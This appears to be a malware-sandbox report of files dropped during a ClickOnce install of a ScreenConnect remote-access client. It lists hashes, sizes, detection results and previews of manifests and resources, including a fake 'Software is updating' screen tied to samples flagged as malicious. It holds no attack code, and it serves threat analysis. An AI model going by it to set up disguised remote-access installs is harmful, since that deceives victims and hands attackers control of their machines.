SHA-256:92B9689FEFD4C6864A9988E4A2C3B94CA1AB669CC3768AFDBD4C78040D7524E3
SHA-512:CFC74F4920BD86B431E84441B9764626B54E9751AAF7527421D588F84E48BCCC5A0271E77F748E050DD97B64683C39958C25A7AE83AD49684DFF169B97AB67F7
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:dropped
Size (bytes):117980
Entropy (8bit):5.585720273564656
Encrypted:false
SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
SHA1:018F32D833124056FCCFC200318542687D0E5565
SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:data
Category:dropped
Size (bytes):4428
Entropy (8bit):4.37670169564968
Encrypted:false
SSDEEP:48:tFQKXCD5v+tgLe6S+9ow87gFW75uv72qhxIdaxsgcm70ZikoDprOaJCf:tFvX4eV+Ww8U45uiqhdxhx04koNOrf
MD5:59A2612550ADAA55B5B27A9E3DDE1756
SHA1:BE3C0ECFC5380A5C76CE0C9500925B7CB047BDEE
SHA-256:71C9B79BBBFEA8431BCC4B0B447C0288D9AF7815517BFC544142F2D41D0712CD
SHA-512:E18F3F12983B2E29D832EF8B3E617DB8ADE6B6133329CFC3647C24AB87482C080D34C1614E6BDD08C3C3EEF8D9E2B44B27DBA80417DE5D5DE37D18998475CC54
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                     • Filename: pzPO97QouM.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: statments.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: Scanned01Document_ms.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: sstatment.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: extukGiBrn.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: Vh0tTzx4Ko.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: support.Client.exe, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                     • Filename: pzPO97QouM.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: statments.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: Scanned01Document_ms.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: sstatment.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: extukGiBrn.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: Vh0tTzx4Ko.exe, Detection: malicious
                                                                                                                                                                                                                                                     • Filename: support.Client.exe, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                  Entropy (8bit):4.9739376290794715
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsbxMHwercD:rHy2DLI4MWoj12K9cAudMHcD
                                                                                                                                                                                                                                                  MD5:5A9944427C35328CB2D7E201CD705C32
                                                                                                                                                                                                                                                  SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                                                                                                                                                                                                                                  SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                                                                                                                                                                                                                                  SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257
                                                                                                                                                                                                                                                  Entropy (8bit):4.896176001960815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                                                                                                                                  MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                                                                                                                                  SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                                                                                                                                  SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                                                                                                                                  SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):50133
                                                                                                                                                                                                                                                  Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26722
                                                                                                                                                                                                                                                  Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1970
                                                                                                                                                                                                                                                  Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                  MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                  SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                  SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                  SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                  Malicious:false
